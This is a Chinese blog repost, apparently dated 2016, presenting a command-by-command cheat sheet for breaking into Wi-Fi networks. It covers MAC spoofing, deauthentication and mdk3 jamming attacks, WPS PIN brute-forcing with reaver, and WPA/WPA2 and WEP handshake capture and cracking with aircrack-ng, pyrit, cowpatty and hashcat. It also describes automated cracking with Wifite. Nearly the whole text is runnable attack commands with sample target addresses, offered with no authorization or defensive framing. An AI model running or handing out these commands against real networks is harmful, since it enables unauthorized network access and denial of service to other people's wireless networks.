首页 > 其他 > 详细

一些Wifi破解姿势

时间:2016-10-20 23:53:48      阅读:1931      评论:0      收藏:0      [点我收藏+]

wlan0:无线网卡设备

BSSID/AP‘s MAC:目标路由器的mac地址

Client‘s MAC:连接到此wifi客户端的mac地址

ESSID:这个无线的名字

技术分享

    CH[X] 扫描的信道号,因为airodump是跳频扫描的,会一直扫描13个信道。后面是你的扫描时间和你本地时间。

    BSSID:路由器MAC地址

    PWR:网卡的信号水平,新号越好数值越大,但是例如第一个出现‘-1’说明该客户端不在我的监听范围内。

    Beacons:就是Beacon数据的速率

    #Date:被捕获的数据分组数量

    #/S :十秒内的捕获数据分组量

    CH:信道号,是从beacon包里面获取的(在企业无线渗透中提到过beacon内容)

    MB:是一直支持速率吧,关于802.11标准的,不过一般是用来看是否开启wps的,一般情况下54e.后面有.的都是开启的,但是也不完全。

    ENC:(Encryption )所使用的加密算法体系。Open=无加密,WPA=WPA/WPA2=WPA2

    CIPHER:加密算法,如CCMP,TKIP….

    Auth:(Authentiction)认证协议:如:PSK:(PWA/WPA2的预共享密钥)或是OPEN(WEP开放)MGT(则是802.1x、eap、radius)因为MGT是独立认证服务器

    ESSID:就是SSID

    Station:客户端MAC

    Notassociated:就是证明客户端没跟AP连上。Associated认证在上一篇文章提到过。

    Lost:是10秒丢包数据

    Rate:传输速率

    Probe:就是一个client试图去连目标AP但没连上

    Frame:通信帧数

 

相关命令

保护措施
macchanger -s  [网卡]             #查看网卡当前的MAC
macchanger -m 想伪造的MAC 网卡         #伪造MAC
macchanger  -A  wlan0                 #修改网卡mac地址为随机地址

vi /etc/hostname  #修改主机名
echo 1 >/proc/sys/net/ipv4/icmp_echo_ignore_all  #防止ping
重启网络连接:sudo /etc/init.d/network-manager restart

从混杂模式中恢复
ifconfig wlan0 down
iwconfig wlan0 mode managed
ifconfig wlan0 up
无线DOS aireplay
-ng -0 3 –a BSSID –c clientMAC wlan0 mdk3 mon0 a –a APMAC -s 80 mdk3 mon0 d -c 信道 #攻击client MAC mdk3 mon0 b –g –c 11 –h 7     #发动虚假AP信号进行干扰 mdk3 mon0 b –n ESSID –g –c 11  #对指定名称(ESSID)发送干扰,-g是伪装为54M的标准的802.11无线网络,-c频道

 

Wifi破解

 Pin码破解(路由器要开启wps功能)


网卡开启混杂模式   
ifconfig wlan0 down   iwconfig wlan0 mode monitor   ifconfig wlan0 up
扫描开启wps的AP
  wash -i wlan0 -C  

破解ping码
  reaver
-i 混杂网卡名 -c 信道 -b APMAC -a -S -vv -d 9 -t 9 (混杂模式使用) 目标信号很好: reaver -i wlan0 -b MAC -a -S -vv -d0 -c 1 目标信号普通: reaver -i wlan0 -b MAC -a -S -vv -d2 -t 5 -c 1 目标信号一般: reaver -i wlan0 -b MAC -a -S -vv -d5 -c 1

通过pin码直接获取路由器密码
  reaver -i 混杂网卡名 -b MAC -p PIN8位数

 


 

Aircrack-ng

WPA/WPA2
(1)网卡开启混杂监听模式   
ifconfig wlan0 down      iwconfig wlan0 mode monitor   ifconfig wlan0 up     --> wlan0

  或者:
  airmon-ng start wlan0  --> wlan0mon
  如果不行:
  airmon-ng check kill
  airmon-ng start wlan0
(2)探测无线网络
  airodump-ng wlan0mon   airodump-ng -c 信道 -w 保存的数据包名 –-bssid AP’MAC wlan0mon
  例:
  airodump-ng -c 6 --bssid 69:71:5E:51:38:EE -w /home/OKing/wifi/FAST_33687 wlan0mon
(3)强制解除客户端认证
  aireplay-ng -0 攻击次数 -a AP’MAC [-c 客户端MAC] [-e bssid] wlan0mon [--ignore-negative-one]
  例:
    aireplay-ng -0 10 -a 69:71:5E:51:38:EE -c 78:AF:8E:7D:8A:9D -e FAST_33687 wlan0mon
    如果信道里有-1,则需要 --ignore-negative-one 参数    
    aireplay-ng -0 10 -a 69:71:5E:51:38:EE -c 78:AF:8E:7D:8A:9D -e "My WiFi" wlan0mon --ignore-negative-one
  在没有客户端连接的情况下,可使用假身份认证攻击(模拟用户认证连接,攻击这个模拟用户)
  aireplay-ng  --fakeauth  -q 10  -a APMAC  -h 模拟用户的MAC
  aireplay-ng  --arpreplay  -b APMAC  -h  模拟用户的MACs

(4)密码破解
  aircrack-ng 数据包名.cap –w 字典路径   airdecap-ng -l -e bssid –p 密码数据包名.cap //破解出密码后,解析加密内容 WEP (1)airmon-ng start wlan0 [信道] 或 airmon-ng check kill airmon-g start wlan0
   启动监听后的混杂模式网卡: wlan0mon (
2)airodump-ng wlan0mon0 (3)airodump-ng -c 信道 -w 数据包名 [--bssid AP’MAC] --ivs wlan0mon0 (4)aireplay-ng -3 -b AP’MAC -h客户端MAC [-x 1024(每秒发送包数量)] wlan0mon0 (5) aircrack-ng 数据包名.ivs –w 字典路径 (解密的报文ivs要20000以上) (6) aircrack-ng -x -f 2 包名.ivs -x 暴力破解 -f 2 复杂度为2    airdecap-ng –w 解密前的秘钥 数据包名.ivs 如:KEY FOUND! [31:32:33:34:35:36:37:38:39:30:61:61:61] (ASCII:1234560aaa) //蓝色部分是解密前的密钥

wesside –v AP’MAC –k 1(重发数据包次数) –i mon0 //aircrack-ng套件中的自动化破解weo加密wifi工具,但成功率较低
tkiptun
-ng –a AP’MAC -h 客户端MAC 网卡   //aircrack-ng套件中的自动化破解wpa/wpa2加密wifi的工具(可加参数:-m 最小数据包长度 -n 最大数据包长度)


辅助命令

airdecloack-ng  --bssid AP’MAC  --filters signal –i 包名.cap #过滤出指定AP报文数据(会生成*.pcap的报文)
ivstools  --convert  a.cap  b.ivs    //将cap数据包转换成ivs数据包
ivstools  --merge  a.ivs  b.ivs  ab.ivs     //将数据包过滤合并

握手包破解命令 
john --wordlist=password.lst --rules --stdout | aircrack-ng -e essid -w - xxx.cap 
使用john在字典上执行排列匹配,将各种组合词提供给aircrack-ng破解使用 

pyrit -r xxx.cap -i password.lst attack_passthrough GPU加速破解 (time 程序/命令名 #计算程序执行时间) 

cowpatty -s ESSID -r xxx.cap -d /path/彩虹表路径 (若SSID中包含空格,要用引号) 

为cowpatty破解制作专用hash tables : 
  genpmk -f 字典 -d 要生成的hash table -s ssid 
很多组织都自己建立了wpa table库,也就是预先使用常见的essid生成hash table
如果要破解essid相同的无线密码,直接网上下载,无需自己再生成
国内比较有名的就是ZerOne团队针对国内常见essid生成的hash table

 


 

Wifite

命令行下wifi自动化破解工具

(1)开启网卡监听模式
  ifconfig wlan1 down
  iwconfig wlan1 mode monitor
  ifconfig wlan1 up
  或者:
airmon-ng start wlan1

(2)启动wifite,此时会自动加载混杂模式下的网卡,探测无线网络
    技术分享
  
   Ctrl + C 停止探测,尽量选择有client的无线进行破解。或者添"all"破解所有
    技术分享

(3)等待破解结果即可...

 


 

 未完待续。。。

Fern-wifi-cracker

wpaclean out.cap in.cap             //整理包文件内容,保证它的格式内容与密码破解程序兼容
aircrack-ng out.cap -J out.hccap        //要把cap数据包转换成hccap数据包才能用oclHashcat破解
cudaHashcat-plus64.exe -m 2500 out.hccap   //破解WPAv2哈希

 

中间人攻击破解wifi

一些Wifi破解姿势

原文:http://www.cnblogs.com/ssooking/p/5926589.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!